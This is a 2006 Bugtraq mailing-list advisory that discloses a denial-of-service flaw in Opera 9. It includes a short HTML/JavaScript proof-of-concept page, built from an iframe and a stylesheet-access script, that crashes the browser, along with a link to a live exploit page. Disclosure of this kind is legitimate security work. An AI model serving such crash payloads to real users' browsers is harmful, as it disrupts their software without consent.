lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060701091737.15250.qmail@securityfocus.com>
Date: 1 Jul 2006 09:17:37 -0000
From: y3dips@...o.or.id
To: bugtraq@...urityfocus.com
Subject: OPERA Web Browser 9 Denial OF Service


ECHO_ADV_35$2006

------------------------------------------------------------------------------------
[ECHO_ADV_35$2006] OPERA Web Browser 9 Denial OF Service
------------------------------------------------------------------------------------

Author		: Ahmad Muammar W.K (a.k.a) y3dips
Date Found	: July, 1th 2006
Location	: Indonesia, Jakarta
web		: http://echo.or.id/adv/adv35-y3dips-2006.txt
Critical Lvl	: Moderated
Impact		: Browser will automatically shutdown
Where		: From Remote
------------------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Opera Web Browser

Application	: Opera Web Browser
version		: Opera/9.00 (X11; Linux i686; U; en)
                  Opera/9.00 (Windows NT 5:1;U;en)
		  Some Other version are bot vulnerable and others are not tested,
			
URL		: http://opera.com
Description 	:

Vulnerability can be exploited by using <iframe> combining with javascript
(documents stylesheet) to create an out-of-bounds memory access.

------------------------------------------------------------------------------------

Exploit Code:
~~~~~~~~~~~~~~~~

-----------------------opera9xploit.html----------------------

<!-- Opera 9 DOS exploit, discovered by 
     Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) 
     http://y3d1ps.blogspot.com
//-->

<html>
<iframe src="palsu.php" name="fake"  ></iframe> 
<script type="text/javascript">
function mystyle() {
    if (fake.document.styleSheets.length == 1 ) 
	{
      f = document.forms["basicstyle"].elements;
      for (j = 0; j < f.length; j++) 
	  	{
       	if (f[j].name == 'fsmain');
      	}  
      }

 }
mystyle();
</script>
</html>

live exploit :

http://y3dips.echo.or.id/opera9-dos/

------------------------------------------------------------------------------------

Solution:
~~~~~~~~

Disable Java Scipt execution from Opera Web browser


------------------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ my beloved ana

~ the_day, K-159 (keep researching), also all echo staff
~ negative , naisenodni crew
~ janex vind "waraxe" @ waraxe.us 
~ newbie_hacker[at]yahoogroups.com
~ #e-c-h-o @irc.dal.net

------------------------------------------------------------------------------------
Contact:
~~~~~~~~

     y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id
     Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] -------------------------------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ